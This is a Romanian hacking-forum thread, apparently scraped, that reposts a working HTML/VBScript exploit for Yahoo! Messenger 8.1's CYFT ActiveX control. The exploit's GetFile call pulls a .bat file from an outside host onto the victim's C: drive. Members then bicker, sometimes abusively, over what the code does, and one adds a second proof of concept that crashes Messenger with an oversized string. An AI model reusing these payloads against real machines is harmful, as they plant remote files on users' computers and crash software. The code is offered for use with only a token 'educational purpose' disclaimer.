Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Downlo

[nullbyte]

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
[b]Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download[/b]
url: [url]http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe[/url]

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]

[b]<font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font>[/b]

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

[b]Marked as:
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False[/b]

From remote: depends by Internet Explorer settings
From local: yes

[b]Description:
This contron contains a "GetFile()" method which allows to download, on
user's pc, an arbitrary file pased as argument.
Remote execution depends by Internet Explorer settings, local execution
works very well.[/b]

[b]greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration[/b]
-----------------------------------------------------------------------------
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai"
MsgBox "Exploit completed"
End Sub
</script>
</span></span>
</code></pre>

[Ras]

imi explica si mie cineva ce face acest exploit? ca sa nu mor prost...

[nullbyte]

test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai"

Teoretic ar trebui sa deschida un cmd cu textul de la acea adresa. Pe IE6 nu merge... Pe IE7 nu am incercat :?

[kw3rln]

ce ai inteles de aici:

This contron contains a "GetFile()" method which allows to download, on
user's pc, an arbitrary file pased as argument.
Remote execution depends by Internet Explorer settings, local execution
works very well.

?

[nullbyte]

Eu, personal am inteles, dar nici la scoala nu stau bine cu explicatu'

Poate Ras s-a grabit sa citeasca?

[Ras]

Contine "GetFile()" si prin acest "GetFile()" poti sa downloadezi din calculatorul victimei.

Remote execution depinde de setarile IE-ului...

[nullbyte]

au doamne sunt idiot

[moubik]

Contine "GetFile()" si prin acest "GetFile()" poti sa downloadezi din calculatorul victimei.

Remote execution depinde de setarile IE-ului...

nu din calculatorul victimei, ci in calculatorul victimei

[alien]

aia e upload nu download... da si eu inteleg la fel. sa uploadezi pe calc victimei un exe si sa-l ruleze.

[nobus]

pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citeste

[nullbyte]

pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citeste

burn in hell

[Guest BanKai]

pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citeste

download pt victima

upload pentru atacator

si cum noi suntem atacatorii evident ca va fi numit upload

as apercia sa nu mai flamezi pe forum sau vei fi banat

[dynasty]

pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citeste

Ce exemplu prost ai dat. In cazu' asta nu stiu cat de multe are in comun getfile() cu wget.

[LLegoLLaS]

Ce exemplu prost ai dat. In cazu' asta nu stiu cat de multe are in comun getfile() cu wget.

lasa-l asa....n desteptaciunea lui

[hirosima]

va las si eu un DOS tot pentru yahoo messenger 8.1:

Yahoo Messenger 8.1 (latest) Remote DoS

Safe for Scripting, Safe for Initialize

<html><body>

<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object>

<script language=vbscript>

arg1=String(517140, "A")

target.c arg1

</script>

</body></html>